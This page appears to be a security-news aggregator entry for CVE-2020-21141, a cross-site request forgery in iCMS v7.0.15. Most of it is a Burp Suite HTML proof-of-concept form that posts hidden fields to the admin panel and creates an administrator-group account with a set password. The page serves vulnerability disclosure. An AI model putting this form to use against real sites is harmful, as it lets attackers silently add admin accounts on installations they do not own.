Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2020-21141: just_for_fun/ICMS CSRF at master · hxcc/just_for_fun

iCMS v7.0.15 was discovered to contain a Cross-Site Request Forgery (CSRF) via /admincp.php?app=members&do=add.

CVE
#csrf

Permalink

Cannot retrieve contributors at this time

url:http://example.com/admincp.php?app=members&do=add

add a admin name was test

<html>

<!-- CSRF PoC - generated by Burp Suite Professional -->

<body>

<script>history.pushState('’, '’, ‘/’)</script>

<form action="http://icms7.idreamsoft.com/admincp.php?app=members&do=save&frame=iPHP&CSRF_TOKEN=4c28f0f8QKQNRAGZMLvRszVV4M4YP-Z9LcQw5n4jlHvq8TB75xVPVxXEAm-CemjoSPieJrYFxlq0J5VblFF1FY5qJah0_jlDDAKiTXs" method="POST">

<input type="hidden" name="uid" value="0" />

<input type="hidden" name="type" value="" />

<input type="hidden" name="gid" value="1" />

<input type="hidden" name="uname" value="test" />

<input type="hidden" name="pwd" value="test123" />

<input type="hidden" name="nickname" value="test" />

<input type="hidden" name="realname" value="" />

<input type="hidden" name="info[QQ]" value="" />

<input type="hidden" name="info[blog]" value="" />

<input type="hidden" name="info[year]" value="" />

<input type="hidden" name="info[month]" value="" />

<input type="hidden" name="info[day]" value="" />

<input type="hidden" name="info[from]" value="" />

<input type="hidden" name="info[sign]" value="" />

<input type="submit" value="Submit request" />

</form>

</body>

</html>

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907